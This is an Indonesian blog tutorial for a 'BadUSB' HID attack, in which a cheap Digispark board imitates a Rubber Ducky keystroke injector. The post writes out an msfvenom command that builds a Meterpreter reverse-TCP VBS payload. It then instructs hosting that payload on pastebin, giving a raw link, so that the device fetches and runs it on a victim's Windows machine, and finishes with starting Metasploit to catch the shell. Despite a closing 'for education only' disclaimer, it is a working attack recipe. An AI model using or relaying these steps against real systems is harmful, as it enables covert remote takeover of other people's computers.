Senin, 15 Januari 2018

Exploit Bad USB With Rubber Ducky

Hallo friend...,
Selamat malam, kali ini gw mau share tentang HID Attack.
Semacam exploit bug usb gitu, kalo judul gw kan pake kata-kata "usb rubber ducky", tapi karena harga usb rubber ducky harganya mahal jadi kita akalin pake digispark mikrokontroler. Disini gw pake digispark attiny85 arduino, jadi jauh lebih murah ketimbang yang aslinya kwkwkwk

Lanjut, sebenernya banyak payload-payload yang dibuat hak5, kalian bisa liat disini.
ah disini yang gw pake itu payload Reverse Shell, oke simak aja tutor berikut ini

Bahan
  •  Mikrokontroler (Digispark)
  •  Arduino Software
  •  OS Kali Linux
Caranya.?
Tenang ini gw kasih tau caranya, pertama
Buat dulu script payloadnya dengan msfvenom, script ini yang nantinya akan di eksekusi oleh payload usb rubber ducky tersebut.

#msfvenom -p windows/meterpreter/reverse_tcp -f vbs --smallest LHOST=localip LPORT=portbebas -o Desktop/output.txt 

Kita buka file output.txt yang ada pada desktop, copykan scriptnya ke pastebin dan create new paste. Sebenarnya yang kita butuhkan cuma linknya doang, karena nanti di script arduinonya kita set agar mendownload dan menjalankan backdoor yg kita buat dan upload tadi. Nah ini kayak contoh punya saya 

https://pastebin.com/raw/DAS7jCJa
 
Jangan didownload gan itu local soalnya kwkwkwk..

Lanjut, kita buka arduino softwarenya dan copy paste code berikut


Nah itu code yang warna merah kalian ganti dengan link pastebin kalian. Inget, jangan colok dulu digisparknya dan pastikan driver digistump sudah diinstall. 
Nah kalau semua sudah siap tinggal kalian klik tanda ceklist kemudian klik upload.

Ok kalau sudah terupload, biasa deh kalian aktifkan metasploitnya dan lanjut eksekusi, gw rasa dah pada faham semuanya deh


Tuh gw kasih juga tutorial videonya, kalau masih kurang faham silahkan bertanya pada kolom komentar wkwkwk

Btw ini hanya untuk edukasi saja yah, jangan yang macem-macem, resiko di tanggung sendriri ...

THX !!!

NB: Semua artikel yg tercantum di http://www.tylexit.tk/ adalah sekedar pengetahuan dan edukasi. Penyalahgunaa di luar tanggung jawab kami
    
Share this article on :

2 komentar:

  1. Background nya bikin mata mules.. coba di redupin dikit, sama jangan buru-buru nulisnya, biar bagus danenak di baca.

    BalasHapus